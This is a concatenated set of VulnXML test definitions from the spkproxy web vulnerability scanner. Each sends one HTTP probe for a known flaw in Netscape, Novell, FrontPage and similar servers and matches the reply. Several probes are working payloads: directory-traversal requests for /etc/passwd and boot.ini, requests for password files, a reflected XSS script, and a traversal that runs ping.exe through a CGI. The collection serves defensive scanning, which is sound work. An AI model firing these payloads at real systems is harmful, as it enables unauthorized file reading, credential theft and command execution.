spkproxy/VulnXML/SiteTests/sitetest-1544.xml0100664000076500007650000000716007566204543017646 0ustar davedave (admpw) "This file contains the encrypted Netscape admin password. It should not be accessible via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin-serv/config/admpw HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1545.xml0100664000076500007650000000712207566204543017645 0ustar davedave (contents.htm) "Default Netscape manual found. All default pages should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /help/contents.htm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1546.xml0100664000076500007650000000711407566204543017647 0ustar davedave (home.html) "Default Netscape manual found. All default pages should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /help/home.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1547.xml0100664000076500007650000000712707566204543017654 0ustar davedave (esperfrm.htm) "Default Netscape manual found. All default pages should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /manual/ag/esperfrm.htm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1548.xml0100664000076500007650000000721707566204543017655 0ustar davedave (/) "Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mc-icons/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1549.xml0100664000076500007650000000721707566204543017656 0ustar davedave (/) "Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ns-icons/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-154.xml0100664000076500007650000000725407566204543017566 0ustar davedave ([SecCheck]/..%2f../ext.ini) "BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /[SecCheck]/..%2f../ext.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1550.xml0100664000076500007650000000727307566204543017650 0ustar davedave (PSCOErrPage.htm?errPagePath=/etc/passwd) "This default Netscape file allows an attacker to read arbitrary files on the host. It should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1551.xml0100664000076500007650000000712307566204543017643 0ustar davedave (/administrators.pwd) "these contain passwords encrypted with unix crypt()" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /_vti_pvt/administrators.pwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1552.xml0100664000076500007650000000710507566204543017644 0ustar davedave (/authors.pwd) "these contain passwords encrypted with unix crypt()" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /_vti_pvt/authors.pwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1553.xml0100664000076500007650000000710107566204543017641 0ustar davedave (/users.pwd) "these contain passwords encrypted with unix crypt()" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /_vti_pvt/users.pwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1555.xml0100664000076500007650000000705307566204543017651 0ustar davedave (GW5/GWWEB.EXE) "Groupwise web interface" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/GW5/GWWEB.EXE HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1556.xml0100664000076500007650000000726507566204543017657 0ustar davedave (GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA) "Some Netware web servers reveal the system path to files when unexpected arguments are sent to CGI." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ SYS\: 200 SYS\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1557.xml0100664000076500007650000000736407566204543017660 0ustar davedave (sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf) "Default scripts can allow arbitrary access to the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ SET CLIENT FILE 200 SET CLIENT FILE 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1558.xml0100664000076500007650000000740607566204543017656 0ustar davedave (sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse) "Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ SERVER_SOFTWARE 200 SERVER_SOFTWARE 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1559.xml0100664000076500007650000000747607566204543017666 0ustar davedave (sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../../../../../system/autexec.ncf) "Novell web server allows any file on the system to viewed through the viewcode.jsp file" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../../../../../system/autexec.ncf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-155.xml0100664000076500007650000000741407566204543017565 0ustar davedave (%22%3cscript%3ealert(%22xss%22)%3c/script%3e) "Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /%22%3cscript%3ealert(%22xss%22)%3c/script%3e HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1560.xml0100664000076500007650000000734207566204543017646 0ustar davedave (sys:/novonyx/suitespot/docs/sewse/misc/test.jse) "Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ SCRIPT_NAME 200 SCRIPT_NAME 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1561.xml0100664000076500007650000000723007566204543017643 0ustar davedave (websinfo.bas) "Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /netbasic/websinfo.bas HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Company 200 Company 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1562.xml0100664000076500007650000000715207566204543017647 0ustar davedave (-e%20print%20Hello) "The PERL interpreter on the novell system may allow any command to be executed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /perl/-e%20print%20Hello HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1563.xml0100664000076500007650000000704307566204543017647 0ustar davedave (files.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /perl/files.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1564.xml0100664000076500007650000000724207566204543017651 0ustar davedave (env.pl) "Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /perl/samples/env.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ HSERVER_SOFTWARE 200 HSERVER_SOFTWARE 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1565.xml0100664000076500007650000000723407566204543017653 0ustar davedave (lancgi.pl) "Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /perl/samples/lancgi.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Lan Boards 200 Lan Boards 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1566.xml0100664000076500007650000000723407566204543017654 0ustar davedave (ndslogin.pl) "Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /perl/samples/ndslogin.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Fullname 200 Fullname 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1567.xml0100664000076500007650000000722207566204543017652 0ustar davedave (volscgi.pl) "Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /perl/samples/volscgi.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Size 200 Size 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1568.xml0100664000076500007650000000704407566204543017655 0ustar davedave (files.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /perl5/files.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1569.xml0100664000076500007650000000705407566204543017657 0ustar davedave (convert.bas) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/convert.bas HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-156.xml0100664000076500007650000000733307566204543017566 0ustar davedave (%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd) "Web server allows reading of files by sending encoded '../' requests. This server may be Boa (boa.org)." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1570.xml0100664000076500007650000000705307566204543017646 0ustar davedave (GW5/GWWEB.EXE) "Groupwise web interface" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /scripts/GW5/GWWEB.EXE HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1571.xml0100664000076500007650000000742307566204543017650 0ustar davedave (webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00) "The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [boot loader] 200 [boot loader] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1572.xml0100664000076500007650000000741107566204543017646 0ustar davedave (webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00) "The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1574.xml0100664000076500007650000000716407566204543017655 0ustar davedave (test.php%20) "The OmniHTTP install may allow php/shtml/pl script disclosure. Upgrade to the latest version." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test.php%20 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <\\? 200 <\\? 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1575.xml0100664000076500007650000000703207566204543017650 0ustar davedave (owa_util%2esignature) "" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /owa_util%2esignature HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1576.xml0100664000076500007650000000710207566204543017647 0ustar davedave (cgitest.exe) "This CGI may allow the server to be crashed remotely 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-win/cgitest.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1578.xml0100664000076500007650000000761607566204543017663 0ustar davedave (%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1) "Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. CVE-2000-0011." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Reply from 127\.0\.0\.1 200 Reply from 127\.0\.0\.1 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. 